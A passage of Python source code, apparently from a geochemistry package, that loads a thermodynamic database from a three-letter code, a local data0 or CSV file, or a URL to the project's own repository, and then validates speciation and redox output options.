+ db) and os.path.isfile("data0." + db): if verbose > 0: print("data1." + db + " was not found in the EQ36DA directory " "but a data0."+db+" was found in the current working " "directory. Using it...") custom_data0 = True data0_lettercode = db dynamic_db = False # search for a data0 locally with open("data0."+db) as data0_content: self.thermo_db = data0_content.read() self.thermo_db_type = "data0 file" self.thermo_db_filename = "data0."+db else: msg = ("Could not locate a 'data1."+db+"' file in the EQ36DA " "directory, nor a 'data0."+db+"' file in the current " "working directory.") self.err_handler.raise_exception(msg) elif db[0:-4].lower() == "data0" and not (db[0:8].lower() == "https://" or db[0:7].lower() == "http://" or db[0:4].lower() == "www."): # e.g., "data0.wrm" custom_data0 = True data0_lettercode = db[-3:].lower() dynamic_db = False if os.path.exists(db) and os.path.isfile(db): with open(db) as data0_content: self.thermo_db = data0_content.read() self.thermo_db_type = "data0 file" self.thermo_db_filename = db else: self.err_handler.raise_exception("Could not locate the data0 file '"+db+"'") elif db[-4:].lower() == ".csv" and not (db[0:8].lower() == "https://" or db[0:7].lower() == "http://" or db[0:4].lower() == "www."): # e.g., "wrm_data.csv" if os.path.exists(db) and os.path.isfile(db): self.thermo_db = pd.read_csv(db) self.thermo_db_type = "CSV file" self.thermo_db_filename = db else: self.err_handler.raise_exception("Could not locate the CSV file '"+db+"'") db_args["filename"] = db db_args["db"] = "dyn" dynamic_db = True custom_data0 = False custom_obigt = db db_csv_name = db.split("/")[-1].lower() elif "data0." in db[-9:].lower() and db[-4:].lower() != ".csv" and (db[0:8].lower() == "https://" or db[0:7].lower() == "http://" or db[0:4].lower() == "www."): # e.g., "https://raw.githubusercontent.com/worm-portal/WORM-db/master/data0.wrm" # Download from URL and decode as UTF-8 text. 
with urlopen(db) as webpage: data0_content = webpage.read().decode() data0_filename = "data0."+db[-3:].lower() # Save to data0 file. with open(data0_filename, 'w') as output: output.write(data0_content) self.thermo_db = data0_content self.thermo_db_type = "data0 file" self.thermo_db_filename = data0_filename custom_data0 = True data0_lettercode = db[-3:] dynamic_db = False elif db[-4:].lower() == ".csv" and (db[0:8].lower() == "https://" or db[0:7].lower() == "http://" or db[0:4].lower() == "www."): # e.g., "https://raw.githubusercontent.com/worm-portal/WORM-db/master/wrm_data.csv" # e.g., "wrm_data.csv" db_csv_name = db.split("/")[-1].lower() # Download from URL and decode as UTF-8 text. with urlopen(db) as webpage: content = webpage.read().decode() # Save to CSV file. with open(db_csv_name, 'w') as output: output.write(content) self.thermo_db = pd.read_csv(db) self.thermo_db_type = "CSV file" self.thermo_db_filename = db_csv_name db_args["filename"] = db_csv_name db_args["db"] = "dyn" dynamic_db = True custom_data0 = False custom_obigt = db_csv_name else: self.err_handler.raise_exception("Unrecognized thermodynamic " "database '{}'".format(db)+" specified for db. A database can specified as:" "\n - a three letter code designating a data0 file. e.g., db='wrm'" "\n - a data0 file in your working directory. e.g., db='data0.wrm'" "\n - a csv file in your working directory. e.g., db='wrm_data.csv'" "\n - a URL directing to a data0 file. e.g.," "\n\t db='https://raw.githubusercontent.com/worm-portal/WORM-db/master/data0.wrm'" "\n\t (note the data0 file in the URL must have 'data0.' followed by a three letter code)" "\n - a URL directing to a valid csv file. 
e.g.," "\n\t db='https://raw.githubusercontent.com/worm-portal/WORM-db/master/wrm_data.csv'") self.verbose = verbose if (self.thermo_db_type == "data0 file" or self.thermo_db_type == "data1 file") and len(db_args) > 0: if self.verbose > 0: print("Ignoring db_args because a premade data0 or data1 file is being used: '" + db + "'") redox_suppression = False if "suppress_redox" in db_args.keys() and self.thermo_db_type != "data0 file" and self.thermo_db_type != "data1 file": if len(db_args["suppress_redox"]) > 0: redox_suppression = True # check input sample file for errors self._check_sample_input_file(input_filename, exclude, db, custom_data0, dynamic_db, charge_balance_on, suppress_missing, redox_suppression) if aq_dist_type not in ["molality", "log_molality", "log_gamma", "log_activity"]: self.err_handler.raise_exception("Unrecognized aq_dist_type. Valid " "options are 'molality', 'log_molality', 'log_gamma', 'log_activity'") if mineral_sat_type not in ["logQoverK", "affinity"]: self.err_handler.raise_exception("Unrecognized mineral_sat_type. Valid " "options are 'logQoverK' or 'affinity'") if redox_type not in ["Eh", "pe", "logfO2", "Ah"]: self.err_handler.raise_exception("Unrecognized redox_type. Valid " "options are 'Eh', 'pe', 'logfO2', or 'Ah'") if redox_flag == "O2(g)" or redox_flag == -3: redox_flag = -3 elif redox_flag == "pe" or redox_flag == -2: redox_flag = -2 elif redox_flag == "Eh" or redox_flag == -1: redox_flag = -1 elif redox_flag == "logfO2" or redox_flag == 0: redox_flag = 0 elif redox_flag == "redox aux" or redox_flag == 1: redox_flag = 1 else: self.err_handler.raise_exception("Unrecognized redox flag. Valid options are 'O2(g)'" ", 'pe', 'Eh', 'logfO2', 'redox aux'") # handle batch_3o naming if batch_3o_filename != None: if ".rds" in batch_3o_filename[-4:]: batch_3o_filename = batch_3o_filename else: batch_3o_filename = "batch_3o_{}.rds".format(data0_lettercode) else: batch_3o_filename = ro.r("NULL") # custom obigt used for energy calculations